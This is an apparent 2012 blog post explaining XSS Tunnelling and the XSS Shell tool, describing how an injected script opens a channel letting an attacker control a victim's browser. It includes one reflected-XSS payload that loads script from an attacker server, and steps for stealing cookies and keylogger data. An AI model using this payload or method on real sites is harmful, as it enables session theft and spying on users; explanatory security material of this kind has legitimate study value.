Thursday, November 22, 2012

XSS TUNNELLING

  • What is XSS Tunnelling?
XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies. XSS Tunnel is a standard HTTP proxy which sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. The XSS Tunnel converts the request and responds transparently to validate the HTTP responses and XSS Shell requests.


  • XSS Channel:
An XSS Channel is an interactive communication channel between two systems
which is opened by an XSS attack. At a technical level, it is a type of AJAX
application which can obtain commands, send responses back and is able to talk
cross-domain.

  • XSS Shell:
The XSS Shell is a tool that can be used to setup an XSS Channel between a victim
and an attacker so that an attacker to control a victim’s browser by sending it
commands. This communication is bi-directional.

Download XSS Shell from here.

  • Example:
To get the XSS Shell to work an attacker needs to inject the XSS Shell’s JavaScript
reference by way of an XSS attack. The attacker is then able to control the victim’s
browser. After this point the attacker can see requests, responses and is able to
instruct the victim’s browser to carryout requests etc.


http://example.com/q="><script
src="http://xssshellserver/xssshell.asp"></script>

  • How Does XSS Shell Work?
Firstly, the server side part of the XSS Shell coordinates the XSS Shell between an
attacker and the victim. It is a server-side application and requires an ASP and IIS
web server. It uses an MS Access database as storage.



The second part of the tool is client-side and written in JavaScript. This loads in the
victim’s browser and is responsible for the receiving and processing of commands
together with providing the channel between the victim and the attacker. This code
was tested under Firefox, IE6 and IE7.

The final part of the XSS Shell is the administration interface. An attacker can send
new commands and receive the responses from a victim(s) browser instantly from
this interface. Again it is ASP and requires IIS.


1. An attacker infects a website with a persistent or reflected (temporary) XSS
attack which calls remote XSS Shell JavaScript.

2. The Victim follows a link or visits the page and executes the JavaScript within
that domain.

3. The Victim’s browser begins to perform periodic requests to the XSS Shell
Server and looks for new commands.

4. When the victim browser receives a new command such as (Get Cookies,
Execute custom JavaScript, Get Key logger Data etc.) it is processed and
returns the results to the XSS Shell.

5. The Attacker can push new commands to victim(s) browser and view the
results from the XSS Shell administration interface.


Happy Hacking...Enjoy...


For educational purpose only...Do not misuse it...

No comments:

Post a Comment